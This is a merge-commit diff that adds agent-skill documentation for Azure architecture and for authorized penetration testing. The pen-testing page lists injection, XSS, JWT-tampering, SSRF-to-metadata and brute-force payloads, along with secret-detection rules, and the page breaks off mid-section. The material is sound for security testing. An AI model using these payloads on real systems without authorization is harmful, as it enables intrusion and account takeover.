Merge pull request #407 from alirezarezvani/feature/sprint-phase-2-cloud

feat(engineering-team): add azure-cloud-architect, security-pen-testing; extend terraform-patterns
2026-03-25 14:22:01 +01:00
parent 2cb3ef74e0 2056ba251f
commit ea2b33ab52
20 changed files with 8521 additions and 3 deletions
--- a/docs/skills/engineering-team/azure-cloud-architect.md
+++ b/docs/skills/engineering-team/azure-cloud-architect.md
@@ -0,0 +1,462 @@
+---
+title: "Azure Cloud Architect — Agent Skill & Codex Plugin"
+description: "Design Azure architectures for startups and enterprises. Use when asked to design Azure infrastructure, create Bicep/ARM templates, optimize Azure. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
+---
+
+# Azure Cloud Architect
+
+<div class="page-meta" markdown>
+<span class="meta-badge">:material-code-braces: Engineering - Core</span>
+<span class="meta-badge">:material-identifier: `azure-cloud-architect`</span>
+<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/azure-cloud-architect/SKILL.md">Source</a></span>
+</div>
+
+<div class="install-banner" markdown>
+<span class="install-label">Install:</span> <code>claude /plugin install engineering-skills</code>
+</div>
+
+
+Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code templates.
+
+---
+
+## Workflow
+
+### Step 1: Gather Requirements
+
+Collect application specifications:
+
+```
+- Application type (web app, mobile backend, data pipeline, SaaS, microservices)
+- Expected users and requests per second
+- Budget constraints (monthly spend limit)
+- Team size and Azure experience level
+- Compliance requirements (GDPR, HIPAA, SOC 2, ISO 27001)
+- Availability requirements (SLA, RPO/RTO)
+- Region preferences (data residency, latency)
+```
+
+### Step 2: Design Architecture
+
+Run the architecture designer to get pattern recommendations:
+
+```bash
+python scripts/architecture_designer.py \
+  --app-type web_app \
+  --users 10000 \
+  --requirements '{"budget_monthly_usd": 500, "compliance": ["SOC2"]}'
+```
+
+**Example output:**
+
+```json
+{
+  "recommended_pattern": "app_service_web",
+  "service_stack": ["App Service", "Azure SQL", "Front Door", "Key Vault", "Entra ID"],
+  "estimated_monthly_cost_usd": 280,
+  "pros": ["Managed platform", "Built-in autoscale", "Deployment slots"],
+  "cons": ["Less control than VMs", "Platform constraints", "Cold start on consumption plans"]
+}
+```
+
+Select from recommended patterns:
+- **App Service Web**: Front Door + App Service + Azure SQL + Redis Cache
+- **Microservices on AKS**: AKS + Service Bus + Cosmos DB + API Management
+- **Serverless Event-Driven**: Functions + Event Grid + Service Bus + Cosmos DB
+- **Data Pipeline**: Data Factory + Synapse Analytics + Data Lake Storage + Event Hubs
+
+See `references/architecture_patterns.md` for detailed pattern specifications.
+
+**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3.
+
+### Step 3: Generate IaC Templates
+
+Create infrastructure-as-code for the selected pattern:
+
+```bash
+# Web app stack (Bicep)
+python scripts/bicep_generator.py --arch-type web-app --output main.bicep
+```
+
+**Example Bicep output (core web app resources):**
+
+```bicep
+@description('The environment name')
+param environment string = 'dev'
+
+@description('The Azure region for resources')
+param location string = resourceGroup().location
+
+@description('The application name')
+param appName string = 'myapp'
+
+// App Service Plan
+resource appServicePlan 'Microsoft.Web/serverfarms@2023-01-01' = {
+  name: '${environment}-${appName}-plan'
+  location: location
+  sku: {
+    name: 'P1v3'
+    tier: 'PremiumV3'
+    capacity: 1
+  }
+  properties: {
+    reserved: true // Linux
+  }
+}
+
+// App Service
+resource appService 'Microsoft.Web/sites@2023-01-01' = {
+  name: '${environment}-${appName}-web'
+  location: location
+  properties: {
+    serverFarmId: appServicePlan.id
+    httpsOnly: true
+    siteConfig: {
+      linuxFxVersion: 'NODE|20-lts'
+      minTlsVersion: '1.2'
+      ftpsState: 'Disabled'
+      alwaysOn: true
+    }
+  }
+  identity: {
+    type: 'SystemAssigned'
+  }
+}
+
+// Azure SQL Database
+resource sqlServer 'Microsoft.Sql/servers@2023-05-01-preview' = {
+  name: '${environment}-${appName}-sql'
+  location: location
+  properties: {
+    administrators: {
+      azureADOnlyAuthentication: true
+    }
+    minimalTlsVersion: '1.2'
+  }
+}
+
+resource sqlDatabase 'Microsoft.Sql/servers/databases@2023-05-01-preview' = {
+  parent: sqlServer
+  name: '${appName}-db'
+  location: location
+  sku: {
+    name: 'GP_S_Gen5_2'
+    tier: 'GeneralPurpose'
+  }
+  properties: {
+    autoPauseDelay: 60
+    minCapacity: json('0.5')
+  }
+}
+```
+
+> Full templates including Front Door, Key Vault, Managed Identity, and monitoring are generated by `bicep_generator.py` and also available in `references/architecture_patterns.md`.
+
+**Bicep is the recommended IaC language for Azure.** Prefer Bicep over ARM JSON templates: Bicep compiles to ARM JSON, has cleaner syntax, supports modules, and is first-party supported by Microsoft.
+
+### Step 4: Review Costs
+
+Analyze estimated costs and optimization opportunities:
+
+```bash
+python scripts/cost_optimizer.py \
+  --config current_resources.json \
+  --json
+```
+
+**Example output:**
+
+```json
+{
+  "current_monthly_usd": 2000,
+  "recommendations": [
+    { "action": "Right-size SQL Database GP_S_Gen5_8 to GP_S_Gen5_2", "savings_usd": 380, "priority": "high" },
+    { "action": "Purchase 1-year Reserved Instances for AKS node pools", "savings_usd": 290, "priority": "high" },
+    { "action": "Move Blob Storage to Cool tier for objects >30 days old", "savings_usd": 65, "priority": "medium" }
+  ],
+  "total_potential_savings_usd": 735
+}
+```
+
+Output includes:
+- Monthly cost breakdown by service
+- Right-sizing recommendations
+- Reserved Instance and Savings Plan opportunities
+- Potential monthly savings
+
+### Step 5: Configure CI/CD
+
+Set up Azure DevOps Pipelines or GitHub Actions with Azure:
+
+```yaml
+# GitHub Actions — deploy Bicep to Azure
+name: Deploy Infrastructure
+on:
+  push:
+    branches: [main]
+
+permissions:
+  id-token: write
+  contents: read
+
+jobs:
+  deploy:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - uses: azure/login@v2
+        with:
+          client-id: ${{ secrets.AZURE_CLIENT_ID }}
+          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
+          subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
+
+      - uses: azure/arm-deploy@v2
+        with:
+          resourceGroupName: rg-myapp-dev
+          template: ./infra/main.bicep
+          parameters: environment=dev
+```
+
+```yaml
+# Azure DevOps Pipeline
+trigger:
+  branches:
+    include:
+      - main
+
+pool:
+  vmImage: 'ubuntu-latest'
+
+steps:
+  - task: AzureCLI@2
+    inputs:
+      azureSubscription: 'MyServiceConnection'
+      scriptType: 'bash'
+      scriptLocation: 'inlineScript'
+      inlineScript: |
+        az deployment group create \
+          --resource-group rg-myapp-dev \
+          --template-file infra/main.bicep \
+          --parameters environment=dev
+```
+
+### Step 6: Security Review
+
+Validate security posture before production:
+
+- **Identity**: Entra ID (Azure AD) with RBAC, Managed Identity for service-to-service auth — never store credentials in code
+- **Secrets**: Key Vault for all secrets, certificates, and connection strings
+- **Network**: NSGs on all subnets, Private Endpoints for PaaS services, Application Gateway with WAF
+- **Encryption**: TLS 1.2+ in transit, Azure-managed or customer-managed keys at rest
+- **Monitoring**: Microsoft Defender for Cloud enabled, Azure Policy for guardrails
+- **Compliance**: Azure Policy assignments for SOC 2 / HIPAA / ISO 27001 initiatives
+
+**If deployment fails:**
+
+1. Check the deployment status:
+   ```bash
+   az deployment group show \
+     --resource-group rg-myapp-dev \
+     --name main \
+     --query 'properties.error'
+   ```
+2. Review Activity Log for RBAC or policy errors.
+3. Validate the Bicep template before deploying:
+   ```bash
+   az bicep build --file main.bicep
+   az deployment group validate \
+     --resource-group rg-myapp-dev \
+     --template-file main.bicep
+   ```
+
+**Common failure causes:**
+- RBAC permission errors — verify the deploying principal has Contributor on the resource group
+- Resource provider not registered — run `az provider register --namespace Microsoft.Web`
+- Naming conflicts — Azure resource names are often globally unique (storage accounts, web apps)
+- Quota exceeded — request quota increase via Azure Portal > Subscriptions > Usage + quotas
+
+---
+
+## Tools
+
+### architecture_designer.py
+
+Generates architecture pattern recommendations based on requirements.
+
+```bash
+python scripts/architecture_designer.py \
+  --app-type web_app \
+  --users 50000 \
+  --requirements '{"budget_monthly_usd": 1000, "compliance": ["HIPAA"]}' \
+  --json
+```
+
+**Input:** Application type, expected users, JSON requirements
+**Output:** Recommended pattern, service stack, cost estimate, pros/cons
+
+### cost_optimizer.py
+
+Analyzes Azure resource configurations for cost savings.
+
+```bash
+python scripts/cost_optimizer.py --config resources.json --json
+```
+
+**Input:** JSON file with current Azure resource inventory
+**Output:** Recommendations for:
+- Idle resource removal
+- VM and database right-sizing
+- Reserved Instance purchases
+- Storage tier transitions
+- Unused public IPs and load balancers
+
+### bicep_generator.py
+
+Generates Bicep template scaffolds from architecture type.
+
+```bash
+python scripts/bicep_generator.py --arch-type microservices --output main.bicep
+```
+
+**Output:** Production-ready Bicep templates with:
+- Managed Identity (no passwords)
+- Key Vault integration
+- Diagnostic settings for Azure Monitor
+- Network security groups
+- Tags for cost allocation
+
+---
+
+## Quick Start
+
+### Web App Architecture (< $100/month)
+
+```
+Ask: "Design an Azure web app for a startup with 5000 users"
+
+Result:
+- App Service (B1 Linux) for the application
+- Azure SQL Serverless for relational data
+- Azure Blob Storage for static assets
+- Front Door (free tier) for CDN and routing
+- Key Vault for secrets
+- Estimated: $40-80/month
+```
+
+### Microservices on AKS ($500-2000/month)
+
+```
+Ask: "Design a microservices architecture on Azure for a SaaS platform with 50k users"
+
+Result:
+- AKS cluster with 3 node pools (system, app, jobs)
+- API Management for gateway and rate limiting
+- Cosmos DB for multi-model data
+- Service Bus for async messaging
+- Azure Monitor + Application Insights for observability
+- Multi-zone deployment
+```
+
+### Serverless Event-Driven (< $200/month)
+
+```
+Ask: "Design an event-driven backend for processing orders"
+
+Result:
+- Azure Functions (Consumption plan) for compute
+- Event Grid for event routing
+- Service Bus for reliable messaging
+- Cosmos DB for order data
+- Application Insights for monitoring
+- Estimated: $30-150/month depending on volume
+```
+
+### Data Pipeline ($300-1500/month)
+
+```
+Ask: "Design a data pipeline for ingesting 10M events/day"
+
+Result:
+- Event Hubs for ingestion
+- Stream Analytics or Functions for processing
+- Data Lake Storage Gen2 for raw data
+- Synapse Analytics for warehouse
+- Power BI for dashboards
+```
+
+---
+
+## Input Requirements
+
+Provide these details for architecture design:
+
+| Requirement | Description | Example |
+|-------------|-------------|---------|
+| Application type | What you're building | SaaS platform, mobile backend |
+| Expected scale | Users, requests/sec | 10k users, 100 RPS |
+| Budget | Monthly Azure limit | $500/month max |
+| Team context | Size, Azure experience | 3 devs, intermediate |
+| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 |
+| Availability | Uptime requirements | 99.9% SLA, 1hr RPO |
+
+**JSON Format:**
+
+```json
+{
+  "application_type": "saas_platform",
+  "expected_users": 10000,
+  "requests_per_second": 100,
+  "budget_monthly_usd": 500,
+  "team_size": 3,
+  "azure_experience": "intermediate",
+  "compliance": ["SOC2"],
+  "availability_sla": "99.9%"
+}
+```
+
+---
+
+## Anti-Patterns
+
+| Anti-Pattern | Why It Fails | Do This Instead |
+|---|---|---|
+| ARM JSON templates for new projects | Verbose, hard to read, no modules | Use Bicep — compiles to ARM, cleaner syntax |
+| Storing secrets in App Settings | Secrets visible in portal, no rotation | Use Key Vault references in App Settings |
+| Single large AKS node pool | Cannot optimize for different workloads | Use multiple node pools: system, app, jobs |
+| Public endpoints on PaaS services | Exposed attack surface | Use Private Endpoints + VNet integration |
+| Over-provisioning "just in case" | Wastes budget month one | Start small, use autoscale, right-size monthly |
+| Shared resource groups for everything | Blast radius, RBAC nightmares | One resource group per environment per workload |
+| No tagging strategy | Cannot track costs or ownership | Tag: environment, owner, cost-center, app-name |
+| Using classic resources | Deprecated, limited features | Use ARM/Bicep resources exclusively |
+
+---
+
+## Output Formats
+
+### Architecture Design
+
+- Pattern recommendation with rationale
+- Service stack diagram (ASCII)
+- Monthly cost estimate and trade-offs
+
+### IaC Templates
+
+- **Bicep**: Recommended — first-party, module support, clean syntax
+- **ARM JSON**: Generated from Bicep when needed
+- **Terraform HCL**: Multi-cloud compatible using azurerm provider
+
+### Cost Analysis
+
+- Current spend breakdown with optimization recommendations
+- Priority action list (high/medium/low) and implementation checklist
+
+---
+
+## Reference Documentation
+
+| Document | Contents |
+|----------|----------|
+| `references/architecture_patterns.md` | 5 patterns: web app, microservices/AKS, serverless, data pipeline, multi-region |
+| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging, networking |
+| `references/best_practices.md` | Naming conventions, tagging, RBAC, network security, monitoring, DR |
--- a/docs/skills/engineering-team/index.md
+++ b/docs/skills/engineering-team/index.md
@@ -1,13 +1,13 @@
 ---
 title: "Engineering - Core Skills — Agent Skills & Codex Plugins"
-description: "41 engineering - core skills — engineering agent skill and Claude Code plugin for code generation, DevOps, architecture, and testing. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
+description: "43 engineering - core skills — engineering agent skill and Claude Code plugin for code generation, DevOps, architecture, and testing. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
 ---

 <div class="domain-header" markdown>

 # :material-code-braces: Engineering - Core

-<p class="domain-count">41 skills in this domain</p>
+<p class="domain-count">43 skills in this domain</p>

 </div>

@@ -29,6 +29,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud

    Design scalable, cost-effective AWS architectures for startups with infrastructure-as-code templates.

+-   **[Azure Cloud Architect](azure-cloud-architect.md)**
+
+    ---
+
+    Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code te...
+
 -   **[Code Reviewer](code-reviewer.md)**

    ---
@@ -77,6 +83,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud

    Production-grade Playwright testing toolkit for AI coding agents.

+-   **[Security Penetration Testing](security-pen-testing.md)**
+
+    ---
+
+    Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance che...
+
 -   **[Self-Improving Agent](self-improving-agent.md)** + 5 sub-skills

    ---
--- a/docs/skills/engineering-team/security-pen-testing.md
+++ b/docs/skills/engineering-team/security-pen-testing.md
@@ -0,0 +1,861 @@
+---
+title: "Security Penetration Testing — Agent Skill & Codex Plugin"
+description: "Use when the user asks to perform security audits, penetration testing, vulnerability scanning, OWASP Top 10 checks, or offensive security. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
+---
+
+# Security Penetration Testing
+
+<div class="page-meta" markdown>
+<span class="meta-badge">:material-code-braces: Engineering - Core</span>
+<span class="meta-badge">:material-identifier: `security-pen-testing`</span>
+<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/security-pen-testing/SKILL.md">Source</a></span>
+</div>
+
+<div class="install-banner" markdown>
+<span class="install-label">Install:</span> <code>claude /plugin install engineering-skills</code>
+</div>
+
+
+Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance checking (see senior-secops) or security policy writing (see senior-security) — this is about systematic vulnerability discovery through authorized testing.
+
+---
+
+## Table of Contents
+
+- [Overview](#overview)
+- [OWASP Top 10 Systematic Audit](#owasp-top-10-systematic-audit)
+- [Static Analysis](#static-analysis)
+- [Dependency Vulnerability Scanning](#dependency-vulnerability-scanning)
+- [Secret Scanning](#secret-scanning)
+- [API Security Testing](#api-security-testing)
+- [Web Vulnerability Testing](#web-vulnerability-testing)
+- [Infrastructure Security](#infrastructure-security)
+- [Pen Test Report Generation](#pen-test-report-generation)
+- [Responsible Disclosure Workflow](#responsible-disclosure-workflow)
+- [Workflows](#workflows)
+- [Anti-Patterns](#anti-patterns)
+- [Cross-References](#cross-references)
+
+---
+
+## Overview
+
+### What This Skill Does
+
+This skill provides the methodology, checklists, and automation for **offensive security testing** — actively probing systems to discover exploitable vulnerabilities. It covers web applications, APIs, infrastructure, and supply chain security.
+
+### Distinction from Other Security Skills
+
+| Skill | Focus | Approach |
+|-------|-------|----------|
+| **security-pen-testing** (this) | Finding vulnerabilities | Offensive — simulate attacker techniques |
+| senior-secops | Security operations | Defensive — monitoring, incident response, SIEM |
+| senior-security | Security policy | Governance — policies, frameworks, risk registers |
+| skill-security-auditor | CI/CD gates | Automated — pre-merge security checks |
+
+### Prerequisites
+
+All testing described here assumes **written authorization** from the system owner. Unauthorized testing is illegal under the CFAA and equivalent laws worldwide. Always obtain a signed scope-of-work or rules-of-engagement document before starting.
+
+---
+
+## OWASP Top 10 Systematic Audit
+
+Use the vulnerability scanner tool for automated checklist generation:
+
+```bash
+# Generate OWASP checklist for a web application
+python scripts/vulnerability_scanner.py --target web --scope full
+
+# Quick API-focused scan
+python scripts/vulnerability_scanner.py --target api --scope quick --json
+```
+
+### A01:2021 — Broken Access Control
+
+**Test Procedures:**
+1. Attempt horizontal privilege escalation: access another user's resources by changing IDs
+2. Test vertical escalation: access admin endpoints with regular user tokens
+3. Verify CORS configuration — check `Access-Control-Allow-Origin` for wildcards
+4. Test forced browsing to admin pages (`/admin`, `/api/admin`, `/debug`)
+5. Modify JWT claims (`role`, `is_admin`) and replay tokens
+
+**What to Look For:**
+- Missing authorization checks on API endpoints
+- Predictable resource IDs (sequential integers vs. UUIDs)
+- Client-side only access controls (hidden UI elements without server checks)
+- CORS misconfigurations allowing arbitrary origins
+
+### A02:2021 — Cryptographic Failures
+
+**Test Procedures:**
+1. Check TLS version — reject anything below TLS 1.2
+2. Verify password hashing: bcrypt/scrypt/argon2 with adequate cost factor
+3. Look for sensitive data in URLs (tokens in query params get logged)
+4. Check for hardcoded encryption keys in source code
+5. Test for weak random number generation (Math.random() for tokens)
+
+**What to Look For:**
+- MD5/SHA1 used for password hashing
+- Secrets in environment variables without encryption at rest
+- Missing `Strict-Transport-Security` header
+- Self-signed certificates in production
+
+### A03:2021 — Injection
+
+**Test Procedures:**
+1. SQL injection: test all input fields with `' OR 1=1--` and time-based payloads
+2. NoSQL injection: test with `{"$gt": ""}` and `{"$ne": null}` in JSON bodies
+3. Command injection: test inputs with `; whoami` and backtick substitution
+4. LDAP injection: test with `*)(uid=*))(|(uid=*`
+5. Template injection: test with `{{7*7}}` and `${7*7}`
+
+**What to Look For:**
+- String concatenation in SQL queries
+- User input passed to `eval()`, `exec()`, `os.system()`
+- Unparameterized ORM queries
+- Template engines rendering user input without sandboxing
+
+### A04:2021 — Insecure Design
+
+**Test Procedures:**
+1. Review business logic flows for abuse scenarios (e.g., negative quantities in carts)
+2. Check rate limiting on sensitive operations (login, password reset, OTP)
+3. Test multi-step flows for state manipulation (skip payment step)
+4. Verify security questions aren't guessable
+
+**What to Look For:**
+- Missing rate limits on authentication endpoints
+- Business logic that trusts client-side calculations
+- Lack of account lockout after failed attempts
+- Missing CAPTCHA on public-facing forms
+
+### A05:2021 — Security Misconfiguration
+
+**Test Procedures:**
+1. Check for default credentials on admin panels
+2. Verify unnecessary HTTP methods are disabled (TRACE, DELETE on public endpoints)
+3. Check error handling — stack traces should never leak to users
+4. Review HTTP security headers (CSP, X-Frame-Options, X-Content-Type-Options)
+5. Check directory listing is disabled
+
+**What to Look For:**
+- Debug mode enabled in production
+- Default admin:admin credentials
+- Verbose error messages with stack traces
+- Missing security headers
+
+### A06:2021 — Vulnerable and Outdated Components
+
+**Test Procedures:**
+1. Run dependency audit against known CVE databases
+2. Check for end-of-life frameworks and libraries
+3. Verify transitive dependency versions
+4. Check for known vulnerable versions (e.g., Log4j 2.0-2.14.1)
+
+```bash
+# Audit a package manifest
+python scripts/dependency_auditor.py --file package.json --severity high
+python scripts/dependency_auditor.py --file requirements.txt --json
+```
+
+### A07:2021 — Identification and Authentication Failures
+
+**Test Procedures:**
+1. Test brute force protection on login endpoints
+2. Check password policy enforcement (minimum length, complexity)
+3. Verify session invalidation on logout and password change
+4. Test "remember me" token security (HttpOnly, Secure, SameSite flags)
+5. Check multi-factor authentication bypass paths
+
+**What to Look For:**
+- Sessions that persist after logout
+- Missing `HttpOnly` and `Secure` flags on session cookies
+- Password reset tokens that don't expire
+- Username enumeration via different error messages
+
+### A08:2021 — Software and Data Integrity Failures
+
+**Test Procedures:**
+1. Check for unsigned updates or deployment artifacts
+2. Verify CI/CD pipeline integrity (signed commits, protected branches)
+3. Test deserialization endpoints with crafted payloads
+4. Check for SRI (Subresource Integrity) on CDN-loaded scripts
+
+**What to Look For:**
+- Unsafe deserialization of user input (pickle, Java serialization)
+- Missing integrity checks on downloaded artifacts
+- CI/CD pipelines running untrusted code
+- CDN scripts without SRI hashes
+
+### A09:2021 — Security Logging and Monitoring Failures
+
+**Test Procedures:**
+1. Verify authentication events are logged (success and failure)
+2. Check that logs don't contain sensitive data (passwords, tokens, PII)
+3. Test alerting thresholds (do 50 failed logins trigger an alert?)
+4. Verify log integrity — can an attacker tamper with logs?
+
+**What to Look For:**
+- Missing audit trail for admin actions
+- Passwords or tokens appearing in logs
+- No alerting on suspicious patterns
+- Logs stored without integrity protection
+
+### A10:2021 — Server-Side Request Forgery (SSRF)
+
+**Test Procedures:**
+1. Test URL input fields with internal addresses (`http://169.254.169.254/` for cloud metadata)
+2. Check for open redirect chains that reach internal services
+3. Test with DNS rebinding payloads
+4. Verify allowlist validation on outbound requests
+
+**What to Look For:**
+- User-controlled URLs passed to `fetch()`, `requests.get()`, `curl`
+- Missing allowlist on outbound HTTP requests
+- Ability to reach cloud metadata endpoints (AWS, GCP, Azure)
+- PDF generators or screenshot services that fetch arbitrary URLs
+
+---
+
+## Static Analysis
+
+### CodeQL Custom Rules
+
+Write custom CodeQL queries for project-specific vulnerability patterns:
+
+```ql
+/**
+ * Detect SQL injection via string concatenation
+ */
+import python
+import semmle.python.dataflow.new.DataFlow
+
+from Call call, StringFormatting fmt
+where
+  call.getFunc().getName() = "execute" and
+  fmt = call.getArg(0) and
+  exists(DataFlow::Node source |
+    source.asExpr() instanceof Name and
+    DataFlow::localFlow(source, DataFlow::exprNode(fmt.getAnOperand()))
+  )
+select call, "Potential SQL injection: user input flows into execute()"
+```
+
+### Semgrep Custom Rules
+
+Create project-specific Semgrep rules:
+
+```yaml
+rules:
+  - id: hardcoded-jwt-secret
+    pattern: |
+      jwt.encode($PAYLOAD, "...", ...)
+    message: "JWT signed with hardcoded secret"
+    severity: ERROR
+    languages: [python]
+
+  - id: unsafe-yaml-load
+    pattern: yaml.load($DATA)
+    fix: yaml.safe_load($DATA)
+    message: "Use yaml.safe_load() to prevent arbitrary code execution"
+    severity: WARNING
+    languages: [python]
+
+  - id: express-no-helmet
+    pattern: |
+      const app = express();
+      ...
+      app.listen(...)
+    pattern-not: |
+      const app = express();
+      ...
+      app.use(helmet(...));
+      ...
+      app.listen(...)
+    message: "Express app missing helmet middleware for security headers"
+    severity: WARNING
+    languages: [javascript, typescript]
+```
+
+### ESLint Security Plugins
+
+Recommended configuration:
+
+```json
+{
+  "plugins": ["security", "no-unsanitized"],
+  "extends": ["plugin:security/recommended"],
+  "rules": {
+    "security/detect-object-injection": "error",
+    "security/detect-non-literal-regexp": "warn",
+    "security/detect-unsafe-regex": "error",
+    "security/detect-buffer-noassert": "error",
+    "security/detect-eval-with-expression": "error",
+    "no-unsanitized/method": "error",
+    "no-unsanitized/property": "error"
+  }
+}
+```
+
+---
+
+## Dependency Vulnerability Scanning
+
+### Ecosystem-Specific Commands
+
+```bash
+# Node.js
+npm audit --json | jq '.vulnerabilities | to_entries[] | select(.value.severity == "critical")'
+
+# Python
+pip audit --format json --desc
+safety check --json
+
+# Go
+govulncheck ./...
+
+# Ruby
+bundle audit check --update
+```
+
+### CVE Triage Workflow
+
+1. **Collect**: Run ecosystem audit tools, aggregate findings
+2. **Deduplicate**: Group by CVE ID across direct and transitive deps
+3. **Score**: Use CVSS base score + environmental adjustments
+4. **Prioritize**: Critical + exploitable + reachable = fix immediately
+5. **Remediate**: Upgrade, patch, or mitigate with compensating controls
+6. **Verify**: Rerun audit to confirm fix, update lock files
+
+```bash
+# Use the dependency auditor for automated triage
+python scripts/dependency_auditor.py --file package.json --severity critical --json
+```
+
+### Known Vulnerable Patterns
+
+| Package | Vulnerable Versions | CVE | Impact |
+|---------|-------------------|-----|--------|
+| log4j-core | 2.0 - 2.14.1 | CVE-2021-44228 | RCE via JNDI injection |
+| lodash | < 4.17.21 | CVE-2021-23337 | Prototype pollution |
+| axios | < 1.6.0 | CVE-2023-45857 | CSRF token exposure |
+| pillow | < 9.3.0 | CVE-2022-45198 | DoS via crafted image |
+| express | < 4.19.2 | CVE-2024-29041 | Open redirect |
+
+---
+
+## Secret Scanning
+
+### TruffleHog Patterns
+
+```bash
+# Scan git history for secrets
+trufflehog git file://. --only-verified --json
+
+# Scan filesystem (no git history)
+trufflehog filesystem . --json
+```
+
+### Gitleaks Configuration
+
+```toml
+# .gitleaks.toml
+title = "Custom Gitleaks Config"
+
+[[rules]]
+id = "aws-access-key"
+description = "AWS Access Key ID"
+regex = '''AKIA[0-9A-Z]{16}'''
+tags = ["aws", "credentials"]
+
+[[rules]]
+id = "generic-api-key"
+description = "Generic API Key"
+regex = '''(?i)(api[_-]?key|apikey)\s*[:=]\s*['\"][a-zA-Z0-9]{20,}['\"]'''
+tags = ["api", "key"]
+
+[[rules]]
+id = "private-key"
+description = "Private Key Header"
+regex = '''-----BEGIN (RSA|EC|DSA|OPENSSH) PRIVATE KEY-----'''
+tags = ["private-key"]
+
+[allowlist]
+paths = ['''\.test\.''', '''_test\.go''', '''mock''', '''fixture''']
+```
+
+### Pre-commit Hook Integration
+
+```yaml
+# .pre-commit-config.yaml
+repos:
+  - repo: https://github.com/gitleaks/gitleaks
+    rev: v8.18.0
+    hooks:
+      - id: gitleaks
+
+  - repo: https://github.com/trufflesecurity/trufflehog
+    rev: v3.63.0
+    hooks:
+      - id: trufflehog
+        args: ["git", "file://.", "--since-commit", "HEAD", "--only-verified"]
+```
+
+### CI Integration (GitHub Actions)
+
+```yaml
+name: Secret Scan
+on: [push, pull_request]
+jobs:
+  scan:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+      - uses: trufflesecurity/trufflehog@main
+        with:
+          extra_args: --only-verified
+```
+
+---
+
+## API Security Testing
+
+### Authentication Bypass
+
+**JWT Manipulation:**
+1. Decode token at jwt.io — inspect claims without verification
+2. Change `alg` to `none` and remove signature: `eyJ...payload.`
+3. Change `alg` from RS256 to HS256 and sign with the public key
+4. Modify claims (`role: "admin"`, `exp: 9999999999`) and re-sign with weak secrets
+5. Test key confusion: HMAC signed with RSA public key bytes
+
+**Session Fixation:**
+1. Obtain a session token before authentication
+2. Authenticate — check if the session ID changes
+3. If the same session ID persists, the app is vulnerable to session fixation
+
+### Authorization Flaws
+
+**IDOR (Insecure Direct Object Reference):**
+```
+GET /api/users/123/profile → 200 (your profile)
+GET /api/users/124/profile → 200 (someone else's profile — IDOR!)
+GET /api/users/124/profile → 403 (properly protected)
+```
+
+Test pattern: Change numeric IDs, UUIDs, slugs in every endpoint. Use Burp Intruder or a simple script to iterate.
+
+**BOLA (Broken Object Level Authorization):**
+Same as IDOR but specifically in REST APIs. Test every CRUD operation:
+- Can user A read user B's resource?
+- Can user A update user B's resource?
+- Can user A delete user B's resource?
+
+**BFLA (Broken Function Level Authorization):**
+```
+# Regular user tries admin endpoints
+POST /api/admin/users          → Should be 403
+DELETE /api/admin/users/123     → Should be 403
+PUT /api/settings/global        → Should be 403
+```
+
+### Rate Limiting Validation
+
+Test rate limits on critical endpoints:
+```bash
+# Rapid-fire login attempts
+for i in $(seq 1 100); do
+  curl -s -o /dev/null -w "%{http_code}" \
+    -X POST https://target.com/api/login \
+    -d '{"email":"test@test.com","password":"wrong"}';
+done
+# Expect: 429 after threshold (typically 5-10 attempts)
+```
+
+### Mass Assignment Detection
+
+```bash
+# Try adding admin fields to a regular update request
+PUT /api/users/profile
+{
+  "name": "Normal User",
+  "email": "user@test.com",
+  "role": "admin",          # mass assignment attempt
+  "is_verified": true,      # mass assignment attempt
+  "subscription": "enterprise"  # mass assignment attempt
+}
+```
+
+### GraphQL-Specific Testing
+
+**Introspection Query:**
+```graphql
+{
+  __schema {
+    types { name fields { name type { name } } }
+  }
+}
+```
+Introspection should be **disabled in production**.
+
+**Query Depth Attack:**
+```graphql
+{
+  user(id: 1) {
+    friends {
+      friends {
+        friends {
+          friends { # Keep nesting until server crashes
+            name
+          }
+        }
+      }
+    }
+  }
+}
+```
+
+**Batching Attack:**
+```json
+[
+  {"query": "mutation { login(user:\"admin\", pass:\"password1\") { token } }"},
+  {"query": "mutation { login(user:\"admin\", pass:\"password2\") { token } }"},
+  {"query": "mutation { login(user:\"admin\", pass:\"password3\") { token } }"}
+]
+```
+Batch mutations can bypass rate limiting if counted as a single request.
+
+---
+
+## Web Vulnerability Testing
+
+### XSS (Cross-Site Scripting)
+
+**Reflected XSS Test Payloads** (non-destructive):
+```
+<script>alert(document.domain)</script>
+"><img src=x onerror=alert(document.domain)>
+javascript:alert(document.domain)
+<svg onload=alert(document.domain)>
+'-alert(document.domain)-'
+</script><script>alert(document.domain)</script>
+```
+
+**Stored XSS**: Submit payloads in persistent fields (comments, profiles, messages), then check if they render for other users.
+
+**DOM-Based XSS**: Look for `innerHTML`, `document.write()`, `eval()` operating on `location.hash`, `location.search`, or `document.referrer`.
+
+### CSRF Token Validation
+
+1. Capture a legitimate request with CSRF token
+2. Replay the request without the token — should fail (403)
+3. Replay with a token from a different session — should fail
+4. Check if token changes per request or is static per session
+5. Verify `SameSite` cookie attribute is set to `Strict` or `Lax`
+
+### SQL Injection
+
+**Detection Payloads** (safe, non-destructive):
+```
+' OR '1'='1
+' OR '1'='1' --
+" OR "1"="1
+1 OR 1=1
+' UNION SELECT NULL--
+' AND SLEEP(5)--     (time-based blind)
+' AND 1=1--          (boolean-based blind)
+```
+
+**Union-Based Enumeration** (authorized testing only):
+```sql
